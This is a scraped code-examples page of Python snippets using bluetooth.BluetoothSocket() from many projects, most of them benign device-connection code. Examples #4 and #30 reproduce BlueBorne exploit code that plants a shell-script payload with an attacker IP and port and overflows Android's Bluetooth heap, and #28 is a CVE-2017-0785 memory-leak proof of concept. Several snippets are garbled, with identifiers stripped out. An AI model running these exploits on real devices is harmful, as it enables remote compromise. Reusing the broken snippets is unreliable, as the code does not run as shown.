Python bluetooth.BluetoothSocket() Examples
The following are 30
code examples of bluetooth.BluetoothSocket().
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Example #1
Source File: From sensorReporter with Apache License 2.0 | 7 votes |
def getRSSI(self): """Detects whether the device is near by or not using RSSI""" addr = self.address # Open hci socket hci_sock = bt.hci_open_dev() hci_fd = hci_sock.fileno() # Connect to device (to whatever you like) bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bt_sock.settimeout(10) result = bt_sock.connect_ex((addr, 1)) # PSM 1 - Service Discovery try: # Get ConnInfo reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17) request = array.array("c", reqstr ) handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1) handle = struct.unpack("8xH14x", request.tostring())[0] # Get RSSI cmd_pkt=struct.pack('H', handle) rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM, bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt) rssi = struct.unpack('b', rssi[3])[0] # Close sockets bt_sock.close() hci_sock.close() return rssi except Exception, e: #self.logger.error("<Bluetooth> (getRSSI) %s" % (repr(e))) return None
Example #2
Source File: From Bluetooth_Headset_Battery_Level with GNU General Public License v3.0 | 6 votes |
def main(): if (len(sys.argv) < 2): print("Usage: <BT_MAC_ADDRESS_1>[.PORT] ...") print(" Port number is optional (default = 4)") exit() else: for device in sys.argv[1:]: i = device.find('.') if i == -1: port = 4 else: port = int(device[i+1:]) device = device[:i] try: s = bluetooth.BluetoothSocket(bluetooth.RFCOMM) s.connect((device, port)) while getATCommand(s, s.recv(128), device): pass s.close() except OSError as e: print(f"{device} is offline", e)
Example #3
Source File: From btproxy with GNU General Public License v3.0 | 6 votes |
def start_service(self, service, adapter_addr=''): print_verbose('Starting service ',service) server_sock=None if service['port'] in self.servers: print('Port',service['port'],'is already binded to') return server_sock if service['protocol'].lower() == 'l2cap': server_sock=BluetoothSocket( L2CAP ) else: server_sock=BluetoothSocket( RFCOMM ) addrport = (adapter_address(self.master_adapter),service['port']) print_verbose('Binding to ',addrport) server_sock.bind(addrport) self.servers.append(service['port']) server_sock.listen(1) port = server_sock.getsockname()[1] return server_sock
Example #4
Source File: From blueborne with GNU General Public License v3.0 | 6 votes |
def set_bt_name(payload, src_hci, src, dst): # Create raw HCI sock to set our BT name raw_sock = bt.hci_open_dev(bt.hci_devid(src_hci)) flt = bt.hci_filter_new() bt.hci_filter_all_ptypes(flt) bt.hci_filter_all_events(flt) raw_sock.setsockopt(bt.SOL_HCI, bt.HCI_FILTER, flt) # Send raw HCI command to our controller to change the BT name (first 3 bytes are padding for alignment) raw_sock.sendall(binascii.unhexlify('01130cf8cccccc') + payload.ljust(MAX_BT_NAME, b'\x00')) raw_sock.close() #time.sleep(1) time.sleep(0.1) # Connect to BNEP to "refresh" the name (does auth) bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.bind((src, 0)) bnep.connect((dst, BNEP_PSM)) bnep.close() # Close ACL connection os.system('hcitool dc %s' % (dst,)) #time.sleep(1)
Example #5
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def send(self,data,): if self.sticky_state == self.not_connected: if self.address is None: raise RuntimeError('No address is set in sticky socket') self.connect(self.address) elif self.sticky_state == self.disconnected: self.rebuild() self.connect(self.address) if self._cb and not self.prevent_recursion: self.prevent_recursion = True data = self._cb(self,data) self.prevent_recursion = False return bluetooth.BluetoothSocket.send(self,data)
Example #6
Source File: From python-for-android with Apache License 2.0 | 5 votes |
def start_server(self): self.server_sock = bluetooth.BluetoothSocket (bluetooth.L2CAP) self.server_sock.bind(("",0x1001)) self.server_sock.listen(1) gobject.io_add_watch(self.server_sock, gobject.IO_IN, self.incoming_connection)
Example #7
Source File: From btk with MIT License | 5 votes |
def loop(): bus = SystemBus() bus.own_name('net.lvht.btk') obj_path = '/net/lvht/btk/HIDProfile' sock = bt.BluetoothSocket(bt.L2CAP) sock.setblocking(False) try: sock.bind(('', PSM_INTR)) except: print("For bluez5 add --noplugin=input to the bluetoothd commandline") print("Else there is another application running that has it open.") sys.exit(errno.EACCES) sock.listen(1) profile = HIDProfile(bus.con, obj_path, sock) opts = { "PSM": GLib.Variant.new_uint16(PSM_CTRL), "ServiceRecord": GLib.Variant.new_string(open('sdp_record.xml', 'r').read()), "RequireAuthentication": GLib.Variant.new_boolean(True), "RequireAuthorization": GLib.Variant.new_boolean(False), } manager = bus.get('org.bluez')['.ProfileManager1'] manager.RegisterProfile(obj_path, str(uuid.uuid4()), opts)
Example #8
Source File: From divoom-adapter with GNU General Public License v3.0 | 5 votes |
def __init__(self, addr): self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.addr = addr
Example #9
Source File: From bluetooth-proximity with Apache License 2.0 | 5 votes |
def __init__(self, addr): self.addr = addr self.hci_sock = bt.hci_open_dev() self.hci_fd = self.hci_sock.fileno() self.bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) self.bt_sock.settimeout(10) self.connected = False self.cmd_pkt = None
Example #10
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def __init__(self,address=None,proto=None, **kwargs): self.not_connected = 0 self.connected = 1 self.disconnected = 2 self.sticky_state = self.not_connected self.address = address self.prevent_recursion = False = kwargs.get('target',None) self.server = kwargs.get('server',False) self._cb = kwargs.get('callback',None) if 'sock' in kwargs: proto = kwargs['sock']._proto bluetooth.BluetoothSocket.__init__(self,proto,kwargs.get('sock',None))
Example #11
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def close(self,): bluetooth.BluetoothSocket.close(self,) self.sticky_state = self.not_connected
Example #12
Source File: From pyescpos with Apache License 2.0 | 5 votes |
def catch(self): _check_lib_bluetooth() self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.socket.connect((self.address, self.port))
Example #13
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def accept(self,): newsock,addr= bluetooth.BluetoothSocket.accept(self,) newsock = StickyBluetoothSocket(addr, self._proto, sock=newsock) newsock.sticky_state = self.connected return newsock,addr
Example #14
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def rebuild(self,): bluetooth.BluetoothSocket.__init__(self,self._proto) self.sticky_state = self.not_connected #self.connect(self.address)
Example #15
Source File: From btproxy with GNU General Public License v3.0 | 5 votes |
def connect_to_svc(self,device, **kwargs): print_verbose('connecting to', device) socktype = bluetooth.RFCOMM if device['protocol'] == None or device['protocol'].lower() == 'rfcomm': socktype = bluetooth.RFCOMM elif device['protocol'].lower() == 'l2cap': socktype = bluetooth.L2CAP else: print('Unsupported protocol '+device['protocol']) while True: try: sock=bluetooth.BluetoothSocket( socktype ) if kwargs.get('addr',None) == 'slave' and 0: for i in range(0,3): try: addrport=(adapter_address(self.slave_adapter),self.starting_psm) print_verbose('binding to ', addrport) sock.bind(addrport) self.starting_psm += 2 break except BluetoothError as e: if i==2: raise e sock.connect((device['host'], device['port'] if device['port'] else 1)) print_verbose('Connected') return sock except BluetoothError as e: if not kwargs.get('reconnect',False): raise RuntimeError(e) print('Reconnecting...')
Example #16
Source File: From calvin-base with Apache License 2.0 | 5 votes |
def createInternetSocket(self): s = bluetooth.BluetoothSocket(bluetooth.RFCOMM) s.setblocking(0) tcp.fdesc._setCloseOnExec(s.fileno()) return s
Example #17
Source File: From calvin-base with Apache License 2.0 | 5 votes |
def createInternetSocket(self): s = bluetooth.BluetoothSocket(bluetooth.RFCOMM) s.setblocking(0) if platformType == "posix" and sys.platform != "cygwin": s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) return s
Example #18
Source File: From cloudbrain with GNU Affero General Public License v3.0 | 5 votes |
def initializeBluetoothDevice(self): socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) try: socket.connect( (self.device_address, THINKGEAR_DEVICE_BLUETOOTH_CHANNEL)) except Exception, e: if self.DEBUG: print("ERROR: %s" % e) sys.exit()
Example #19
Source File: From python-for-android with Apache License 2.0 | 5 votes |
def connect(self, addr): sock = bluetooth.BluetoothSocket (bluetooth.L2CAP) try: sock.connect((addr, 0x1001)) except bluez.error, e: self.add_text("\n%s" % str(e)) sock.close() return
Example #20
Source File: From peach with Mozilla Public License 2.0 | 5 votes |
def start(self): if self._socket: return if usingLightBlue: for each_try in range(1, 5): print("[*] Connecting to %s on PSM %d (%d)" % (self.ba_addr, self.port, each_try)) try: self._socket = lightblue.socket(lightblue.L2CAP) self._socket.connect((self.ba_addr, self.port)) except socket.error: self._socket = None print("Failed.") print("Wait {} seconds ...".format(self.giveup)) time.sleep(self.giveup) else: print("Done.") break if usingBluetooth: for each_try in range(1, 5): print("[*] Connecting to %s on PSM %d (%d)" % (self.ba_addr, self.port, each_try)) try: self._socket = bluetooth.BluetoothSocket(bluetooth.L2CAP) self._socket.connect((self.ba_addr, self.port)) except socket.error: self._socket = None print("Failed.") print("Wait {} seconds ...".format(self.giveup)) time.sleep(self.giveup) else: print("Done.") break print("") if not self._socket: raise PeachException("L2CAP connection attempt failed.")
Example #21
Source File: From peach with Mozilla Public License 2.0 | 5 votes |
def pybluez_server_test(): s = bluetooth.BluetoothSocket(bluetooth.L2CAP) s.bind(("", 0x1001)) s.listen(1) conn, addr = s.accept() print("Connected by %s" % addr) data = s.recv(1024) print("Received: %s" % data) conn.close() s.close()
Example #22
Source File: From miaomiaoji-tool with MIT License | 5 votes |
def connect(self): if self.address is None and not self.scandevices(): return False if not self.scanservices(): return False"Service found. Connecting to \"%s\" on %s..." % (self.service["name"], self.service["host"])) self.sock = BluetoothSocket(RFCOMM) self.sock.connect((self.service["host"], self.service["port"])) self.sock.settimeout(60)"Connected.") self.registerCrcKeyToBt() return True
Example #23
Source File: From ReachView with GNU General Public License v3.0 | 5 votes |
def initialize(self): self.server_socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.server_socket.bind(("",bluetooth.PORT_ANY)) self.server_socket.listen(1) port = self.server_socket.getsockname()[1] uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee" bluetooth.advertise_service( self.server_socket, "ReachBluetoothSocket", service_id = uuid, service_classes = [uuid, bluetooth.SERIAL_PORT_CLASS], profiles = [bluetooth.SERIAL_PORT_PROFILE], )
Example #24
Source File: From platypush with MIT License | 5 votes |
def connect(self, protocol=None, device: str = None, port: int = None, service_uuid: str = None, service_name: str = None): """ Connect to a bluetooth device. You can query the advertised services through ``find_service``. :param protocol: Supported values: either 'RFCOMM'/'L2CAP' (str) or bluetooth.RFCOMM/bluetooth.L2CAP int constants (int) :param device: Device address or name :param port: Port number :param service_uuid: Service UUID :param service_name: Service name """ from bluetooth import BluetoothSocket addr, port, protocol = self._get_addr_port_protocol(protocol=protocol, device=device, port=port, service_uuid=service_uuid, service_name=service_name) sock = self._get_sock(protocol=protocol, device=addr, port=port) if sock: self.close(device=addr, port=port) sock = BluetoothSocket(protocol)'Opening connection to device {} on port {}'.format(addr, port)) sock.connect((addr, port))'Connected to device {} on port {}'.format(addr, port)) self._socks[(addr, port)] = sock
Example #25
Source File: From NeuroPi with GNU General Public License v3.0 | 5 votes |
def connectToMindWaveMobile(self, mac): # connecting via bluetooth RFCOMM self.mindwaveMobileSocket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) mindwaveMobileAddress = mac; while(True): try: self.mindwaveMobileSocket.connect((mindwaveMobileAddress, 1)) return; except bluetooth.btcommon.BluetoothError as error: print "Could not connect: ", error, "; Retrying in 5s..." time.sleep(5)
Example #26
Source File: From self_driving_pi_car with MIT License | 5 votes |
def test_bluetooth_1_connection(self): socket = blue.BluetoothSocket(blue.RFCOMM) socket.connect((self.ID, 1)) peer_name = socket.getpeername() self.assertEqual(self.ID, peer_name[0])
Example #27
Source File: From nxt-python with GNU General Public License v3.0 | 5 votes |
def connect(self): if self.debug: print('Connecting via Bluetooth...') sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) sock.connect((, BlueSock.PORT)) self.sock = sock if self.debug: print('Connected.') return Brick(self)
Example #28
Source File: From bluescan with GNU General Public License v3.0 | 4 votes |
def main(): target_bd_addr = args['BD_ADDR'] l2cap_mtu = 50 sock = BluetoothSocket(L2CAP) set_l2cap_mtu(sock, l2cap_mtu) sock.connect((target_bd_addr, PSM_SDP)) print('Sending the first SDP_SERVICE_SEARCH_REQ PDU') params = { 'ServiceSearchPattern': b'\x35\x03\x19\x01\x00', 'MaximumServiceRecordCount': 0xFFFF, 'ContinuationState': b'\x00' } sock.send(sdp_service_search_req(params)) sdp_service_search_rsp = sock.recv(l2cap_mtu) info_len = sdp_service_search_rsp[-3] if info_len != ANDROID_CONT_STATE_INFO_LEN: print(sdp_service_search_rsp[-3]) print('Invalid continuation state received.') sys.exit(1) stack = b'' for i in range(1, 30): # 越界读的次数太多会导致目标蓝牙崩溃 print('Sending packet %d' % i) params = { 'ServiceSearchPattern': b'\x35\x03\x19\x01\x00', 'MaximumServiceRecordCount': 0x0001, 'ContinuationState': sdp_service_search_rsp[-3:] } sock.send(sdp_service_search_req(params)) sdp_service_search_rsp = sock.recv(l2cap_mtu) # Leaked info is in ServiceRecordHandleList field stack += sdp_service_search_rsp[9:-3] sock.close() print(hexdump(stack)) if len(stack) > 20: print('CVE-2017-0785')
Example #29
Source File: From bluepy-scratch-link with BSD 3-Clause "New" or "Revised" License | 4 votes |
def handle_request(self, method, params): """Handle requests from Scratch""" logger.debug("handle request to BT device") logger.debug(method) if len(params) > 0: logger.debug(params) res = { "jsonrpc": "2.0" } if self.status == self.INITIAL and method == 'discover': logger.debug("Starting async discovery") self.status = self.DISCOVERY self.bt_thread = self.BTThread(self, params["majorDeviceClass"], params["minorDeviceClass"]) self.bt_thread.start() res["result"] = None elif self.status in [self.DISCOVERY, self.DISCOVERY_COMPLETE] and method == 'connect': # Cancel discovery while self.status == self.DISCOVERY: logger.debug("Cancelling discovery") self.bt_thread.cancel_discovery = True time.sleep(1) addr = params['peripheralId'] logger.debug(f"connecting to the BT device {addr}") try: self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.sock.connect((addr, 1))"connected to BT device: {addr}") except bluetooth.BluetoothError as e: logger.error(f"failed to connect to BT device: {e}", exc_info=e) self.status = self.DONE self.sock = None if self.sock: res["result"] = None self.status = self.CONNECTED else: err_msg = f"BT connect failed: {addr}" res["error"] = { "message": err_msg } self.status = self.DONE elif self.status == self.CONNECTED and method == 'send': logger.debug("handle send request") if params['encoding'] != 'base64': logger.error("encoding other than base 64 is not " "yet supported: ", params['encoding']) msg_bstr = params['message'].encode('ascii') data = base64.standard_b64decode(msg_bstr) self.sock.send(data) res['result'] = len(data) logger.debug(res) return res
Example #30
Source File: From blueborne with GNU General Public License v3.0 | 4 votes |
def pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base): # Gen new BDADDR, so that the new BT name will be cached src = set_rand_bdaddr(src_hci) # Payload is: '"\x17AAAAAAsysm";\n<bash_commands>\n#' # 'sysm' is the address of system() from libc. The *whole* payload is a shell script. # 0x1700 == (0x1722 & 0xff00) is the "event" of a "HORRIBLE_HACK" message. payload = struct.pack('<III', 0xAAAA1722, 0x41414141, system_addr) + b'";\n' + \ SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) + b'\n#' assert len(payload) < MAX_BT_NAME assert b'\x00' not in payload # Puts payload into a known bss location (once we create a BNEP connection). set_bt_name(payload, src_hci, src, dst) prog = log.progress('Connecting to BNEP again') bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.bind((src, 0)) bnep.connect((dst, BNEP_PSM)) prog.success() prog = log.progress('Pwning...') # Each of these messages causes BNEP code to send 100 "command not understood" responses. # This causes list_node_t allocations on the heap (one per reponse) as items in the xmit_hold_q. # These items are popped asynchronously to the arrival of our incoming messages (into hci_msg_q). # Thus "holes" are created on the heap, allowing us to overflow a yet unhandled list_node of hci_msg_q. for i in range(20): bnep.send(binascii.unhexlify('8109' + '800109' * 100)) # Repeatedly trigger the vuln (overflow of 8 bytes) after an 8 byte size heap buffer. # This is highly likely to fully overflow over instances of "list_node_t" which is exactly # 8 bytes long (and is *constantly* used/allocated/freed on the heap). # Eventually one overflow causes a call to happen to "btu_hci_msg_process" with "p_msg" # under our control. ("btu_hci_msg_process" is called *constantly* with messages out of a list) for i in range(1000): # If we're blocking here, the daemon has crashed _, writeable, _ =[], [bnep], [], PWNING_TIMEOUT) if not writeable: break bnep.send(binascii.unhexlify('810100') + struct.pack('<II', 0, acl_name_addr)) else:"Looks like it didn't crash. Possibly worked") prog.success()